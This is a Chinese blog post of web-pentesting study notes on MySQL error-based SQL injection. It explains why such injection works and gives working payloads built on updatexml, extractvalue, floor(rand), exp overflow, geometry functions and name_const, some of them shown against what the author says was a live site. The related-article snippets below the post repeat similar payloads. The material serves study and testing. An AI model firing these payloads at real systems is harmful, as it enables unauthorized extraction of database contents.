MySQL报错注入

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量1.4k 收藏 6
点赞数 1
分类专栏: web渗透学习笔记 文章标签: SQL注入 报错注入 updatexml floor extractvalue
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35569814/article/details/100436922
版权

注入简介

什么是报错注入?

顾名思义,报错注入就是通过页面爆出的错误信息,构造合适的语句来获取我们想要的数据,本章节讲述的注入,数据库为MySQL

报错注入成因

那么报错注入是怎么形成的呢?

首先是应用系统未关闭数据库报错函数,对于一些SQL语句的错误,直接回显在了页面上,部分甚至直接泄露数据库名和表名;

其次,必不可少就是后台未对MySQL相应的报错函数进行过滤

引入知识

updatexml()函数。语法为

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 

第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 

第三个参数:new_value,String格式,替换查找到的符合条件的数据 

如果找不到相应的xpath路径,updatexml函数就会报出错误

concat()函数。此函数用于连接字符串;由于updatexml()函数xpath路径需要连接特殊字符,被连接的特殊字符需要进行16进制编码

concat_ws()函数。语法concat_ws(0x7e,database(),use()),会把查出来的库名和用户通过~连接起来完成报错

注入实现

在挖互联网漏洞的时候,遇到的报错注入,打开漏洞所在url,如下图

对id传参输入单引号进行测试,发行MySQL报错,并且直接爆出了表名,如下图

这个报错,已经爆出了完整语句,我们尝试对源语句进行闭合,payload:) and (1,如下图

构建报错语句,payload:) and updatexml(1,concat(0x7e,database()),1) and (1,如下图

扩展

在日常测试中,后台可能会过滤掉一些常用函数,那么有没有其他函数来替代呢?肯定是有的!

Xpath报错

updatexml()函数,用法就不在过多介绍

extractvalue()函数,payload:select * from test where id=1 and (extractvalue(1,concat(0x7e,database()));

虚拟表主键位重复报错

floor()函数,payload:select * from test where id=1 and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

fioor函数报错详细资料参考:https://www.cnblogs.com/sfriend/p/11365999.html

https://blog.csdn.net/weixin_45146120/article/details/100062786

其他待测试函数

整形溢出报错

exp()函数,整形溢出报错,注意:在MySQL5.5.5版本之后才会报错,语法:exp(~(select * from (select database())x))

几何函数报错

函数对参数要求是形如(1 2,2 2,3 3),几何数据,如果不满足则会报错,主要函数包括,可在5.6.22版本测试,我用5.5.5没测出来

语法:multipoint(select * from (select * from ( select * from (select database())c)b)a)

multipoint()函数,

geometrycollection()函数

multilinestring()函数

linestring()函数

multipolygon()函数

polygon()函数

列名重复报错

name_const(name,value)函数会用传入参数返回一系列结果集,传入参数必须是常量,经过测试只能查version(),略鸡肋

语法:select * from (select name_const(version(),1),name_const(version(),1))a;

参考

参考文章:http://www.cnblogs.com/wocalieshenmegui/p/5917967.html

参考文章:https://blog.csdn.net/Auuuuuuuu/article/details/91415165

参考书籍:《代码审计:企业级Web代码安全架构》

秋水sir
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MYSQL报错注入
聚鼎安全
01-08 3277
目录审计思路报错语句报错函数查询表floor报错函数讲解报错原理语句xpath语法报错函数讲解语句整数溢出报错exppowcot列名重复报错name_constjoin using几何函数报错不存在函数报错 审计思路 代码中带入查询的参数没有经过任何过滤并产生报错,具有报错信息提示,就可以用报错查询。 常用报错检测符号:’ \ ; %00 ) ( # " 报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。 特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_c
MySQL五种报错注入1
08-04
MySQL五种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
详细解读mysql十二种报错注入
weixin_45778886的博客
11-06 432
使用条件 查询不回显内容,会打印错误信息 报错原理 报错型注入则是利用了MySQL的第8652号bug :Bug #8652 group by part of rand() returns duplicate key error来进行的盲注,使得MySQL由于函数的特性返回错误信息,进而我们可以显示我们想要的信息,从而达到注入的效果 mysql语句的特性–子查询 在这里虽然语句b有错误,但是由于语句a没有错误所以成功查询出变量A,随后变量A与语句b构成新的语句,又由于语句b存在错误,所以报错时连带着变量
怎么调取cstring left函数_Go语言函数深度解析(上)
weixin_39605414的博客
11-22 195
基本原理函数,几乎是每种编程语言的必备语法,通过函数把一系列的动作汇总起来,在不同的地方重复使用。我们在数学中曾经就使用过函数,他的形式类似于y=f(x),这就是一个完整的调用过程,y就是函数计算后得到的值,x就是传入的变量。怎么用?相信在看这个教程的人肯定已经接触过其他的编程语言,我就不多废话了,就是干。go语言中最基本的函数是这样的,以func为关键字标记函数funcfunctionPara...
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 776
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
MySQL报错注入方法整理
jpygx123的博客
11-17 9571
mysql暴错注入方法整理,通过floorUpdateXmlExtractValue,NAME_CONST,Error based Double Query Injection等方法。 报错注入:(and后不能直接跟select,可以加()) 1.报错注入floor---->(select 1 from (select count(*),concat((payload[]),floo...
mysql 报错注入 技巧_Mysql注入小技巧方法
weixin_29088655的博客
02-01 276
一、字符串截取函数平时我们进行盲注时用substr()函数截取字符串,当substr()被过滤时,怎么办呢?我们可以用这些函数可以达到同样的效果1.left(str, length)从左边第length位开始截取字符串用法:left(str, length),即:left(被截取字符串, 截取长度)SELECT LEFT('www.baidu.com',8)结果为:www.baid2.right(...
Mysql报错注入详解.docx
11-20
Mysql报错注入详解.docxMysql报错注入详解.docx
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被错误地用于构造数据库查询时,导致数据库返回错误信息。这些错误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
SQL 报错注入详解
2301_78008478的博客
05-08 898
近期学习 SQL 报错注入,本篇文章为关于报错注入的一些个人理解,如有错误,希望指出 本文使用 sqli-labs 数据库作为示例报错注入方式有很多,其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种,本篇文章主要对这三种进行分析先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5) 复制首先这个 payload 和网上很多的不太一样,查阅网上相关博客时发现大多数的 payload 都是这样写的 复制这个就是把发生报错的 se
Mysql注入 -- 报错注入
weixin_41489908的博客
05-20 740
​时刻清零,不要老把自己的一套拿出来。。。 ---- 网易云热评 一、常用函数 1、count();统计该列有几条数据 2、rand():产生0-1随机数 3、group by:根据某一列排序,改列必须出现在前面查询的内容 4、floor(1.23):获取小于等于该值的最大整数 5、as:给查询的列名内容重命名 6、concat(1,2,3):将里面的内容连接在一起 二、实例演示 1、获取当前数据库名称 http://192.168.139.129/sqli/Less-.
MySQL 常用报错注入原理分析
weixin_33737774的博客
08-16 271
简介 这段时间学习SQL盲注中的报错注入,发现语句就是那么两句,但是一直不知道报错原因,所以看着别人的帖子学习一番,小本本记下来 (1) count() , rand() , group by 1.报错语句构造   先直接上两个网上经常使用的报错语句,主要分析第一条,第二条是简化后的  select 1,count(*),concat(0x3a,0x3a,(select user()...
mysql报错型手工注入_mysql手工注入
weixin_33526828的博客
02-28 229
1.判断是否存在注入点的方法和其他数据库类似,and 1=1 和and 1=2 2.判断数据库为oracle 提交注释字符/*,返回正常即是MySQL,否则继续提交注释符号--,该符号......实战access手工注入(通用的方法) “显示友好的HTTP错误信息”前面的钩,...Mysql 报错注入 SQL 注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注 以及延时注入, ...
新型mysql报错注入_新型Mysql报错注入_MySQL
weixin_35342955的博客
01-19 71
原文是俄文,不好做翻译,附上大概的内容:这种报错注入主要基于Mysql数据类型溢出mysql > SELECT 18446744073709551610 * 2 ;ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'mysql > SELECT - 1 * ...
mysql报错注入_mysql报错注入
weixin_29214335的博客
01-13 249
报错注入这里主要介绍3种MySQL数据库报错注入的发法,分别是updatexmlfloor和exp。1.updatexmlupdatexml的报错原理从本质上来说就是函数的报错。selectupdatexml(1,concat(0x7e,(select version()),0x7e),1);这里还是使用前面的例子,举出一个爆破数据库版本的样例Payload:爆破数据库版本信息?id=1' +...
mysql 报错注入语句_mysql 报错注入语句
weixin_42548961的博客
01-19 230
'-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)#'=0 group by elt(rand(),version())having sum(0)#'-updatexml(0,repeat(version(),2),2)#'|polygon((select*from(select name_const(v...
MySQL 报错注入
Risk2S的小博客
05-20 1379
利用数据库报错来显示数据的注入方式。通常注入的sql语句一般是“select * from 表 where 参数=值” ①: floor() 注入语句: id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2)) x from information_schema.table
SQL注入mysql显错注入
weixin_34127717的博客
09-03 565
在我们实际***中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报错来进行注入,另外如何使用手工进行全程注入的利用过程,如果你知道sqlmap里面...
mysql报错注入updatexml原理
05-17
MySQL 报错注入是一种利用错误信息披露漏洞来进行 SQL 注入攻击的方法。其中,updatexml 函数是一种常用的利用方式之一。 updatexml 函数可以用于对 XML 类型的数据进行操作。其基本语法如下: ``` updatexml...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值